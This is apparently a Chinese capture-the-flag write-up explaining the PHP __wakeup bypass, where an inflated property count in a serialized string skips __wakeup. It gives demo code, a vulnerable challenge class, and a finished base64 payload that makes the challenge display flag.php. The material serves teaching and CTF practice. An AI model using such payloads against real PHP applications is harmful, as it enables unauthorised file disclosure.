漏洞介绍
当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行
演示代码:
<?php
highlight_file(__FILE__);
class test{
var $bull;
public function __destruct(){
$this->bull = "destruct<br/>";
echo $this->bull;
echo "destruct ok!<br/>";
}
public function __wakeup(){
$this->bull = "wake up<br/>";
echo $this->bull;
echo "wake up ok!<br/>";
}
}
// 正常payload
// $payload = O:4:"test":1:{s:4:"bull";s:4:"sdfz";}
// 触发漏洞的payload
$payload = 'O:4:"test":2:{s:4:"bull";s:4:"sdfz";}';
$abc = unserialize($payload);
?>
题目
<?php
class SoFun{
protected $file='index.php';
public function __construct($file){
$this->file = $file;
}
function __destruct(){
if(!empty($this->file))
{
//查找file文件中的字符串,如果有'\\'和'/'在字符串中,就显示错误
if(strchr($this->file,"\\")===false && strchr($this->file, '/')===false)
{
show_source(dirname (__FILE__).'/'.$this ->file);
}
else{
die('Wrong filename.');
}
}
}
function __wakeup()
{
$this-> file='index.php';
}
public function __toString()
{
return '';
}
}
if (!isset($_GET['file']))
{
show_source('index.php');
}
else{
$file=base64_decode( $_GET['file']);
echo unserialize($file);
}
?>
解题:
- 获得反序列化对象
<?php
class SoFun{
protected $file='index.php';
public function __construct($file){
$this->file = $file;
}
function __destruct(){
if(!empty($this->file))
{
//查找file文件中的字符串,如果有'\\'和'/'在字符串中,就显示错误
if(strchr($this->file,"\\")===false && strchr($this->file, '/')===false)
{
show_source(dirname (__FILE__).'/'.$this ->file);
}
else{
die('Wrong filename.');
}
}
}
function __wakeup()
{
$this-> file='index.php';
}
public function __toString()
{
return '';
}
}
if (!isset($_GET['file']))
{
//show_source('index.php');
}
else{
$file=base64_decode( $_GET['file']);
echo unserialize($file);
}
$test = new SoFun('flag.php');
echo base64_encode(serialize($test));
结果:
Tzo1OiJTb0Z1biI6MTp7czo3OiIAKgBmaWxlIjtzOjg6ImZsYWcucGhwIjt9
?>
2、利用漏洞
# 把变量数量更改为大于实际的变量数量并重新用base64编码
Tzo1OiJTb0Z1biI6Mjp7czo3OiIAKgBmaWxlIjtzOjg6ImZsYWcucGhwIjt9
3、访问URL
